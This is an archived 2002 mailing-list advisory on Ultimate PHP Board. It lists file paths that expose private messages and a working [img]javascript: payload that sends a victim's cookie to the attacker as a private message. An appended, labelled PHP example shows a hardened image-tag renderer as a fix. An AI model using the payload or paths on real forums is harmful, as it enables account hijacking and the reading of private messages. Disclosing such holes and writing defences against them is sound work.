Vulnerability Development mailing list archives

Security holes : Ultimate PHP Board


From: frog frog <leseulfrog () hotmail com>
Date: 22 Apr 2002 09:05:49 -0000



Product :
Ultimate PHP Board
http://xcrew.host.sk

Versions :
1.0 Beta
1.1

Problems : 
1.0 B :
- Reading of private messages
1.1 & 1.0 B :
- Access to users/admins accounts

Exploits :
1.0 B :
- /members/ID.pm
- /members/ID.xbb
1.1 :
- [img]javascript:window.open('
index.php?
upb=pm&mode=send&send=yes&target_id=MY-
ID&betreff=cookie&pm='+document.cookie+
'&smilies=1&use_upbcode=1&pmbox_id=VICTIME-
ID&check=yes
')[/img]



More details in French :
http://www.ifrance.com/kitetoua/tuto/UPB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FUPB.txt&langpair=fr%7Cen&hl=en&prev=%2Flanguage_tools

frog-m@n
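
The 1.1 issue above works because the `[img]` tag accepts any URL scheme. The following hardened renderer is an added example, not code from the original post or from Ultimate PHP Board; the function names `is_safe_img_url` and `render_post` and the sample posts are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not Ultimate PHP Board's own code.
const ALLOWED_IMG_SCHEMES = ['http', 'https'];

// True only for absolute http(s) URLs with a host and no characters that
// could hide a scheme or break out of the src attribute.
function is_safe_img_url(string $url): bool
{
    if ($url === '' || preg_match('/[\x00-\x20\x7f"\'<>`]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false; // javascript:, data: and relative URLs have no host
    }
    return in_array(strtolower($parts['scheme']), ALLOWED_IMG_SCHEMES, true);
}

// Escape the whole post first, then turn only validated [img] tags into HTML.
function render_post(string $raw): string
{
    $escaped = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    $html = preg_replace_callback(
        '#\[img\](.*?)\[/img\]#is',
        function (array $m): string {
            // Validate the URL as the user typed it, then re-escape for output.
            $url = htmlspecialchars_decode($m[1], ENT_QUOTES);
            if (!is_safe_img_url($url)) {
                return $m[0]; // rejected: the tag stays as inert, escaped text
            }
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $escaped
    );
    return $html ?? $escaped; // on a regex error, fall back to plain escaped text
}

// Constructed sample posts, not taken from a real board.
$samples = [
    '[img]http://example.com/avatar.png[/img]',
    '[img]javascript:void(0)[/img]',
    'Plain text with <b>markup</b> and no image tag',
];
foreach ($samples as $post) {
    echo render_post($post), PHP_EOL;
}
```

The payload in the post also relies on the private-message form accepting a send via a GET request, so requiring POST with a per-session token for `mode=send` removes the second half of the chain.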


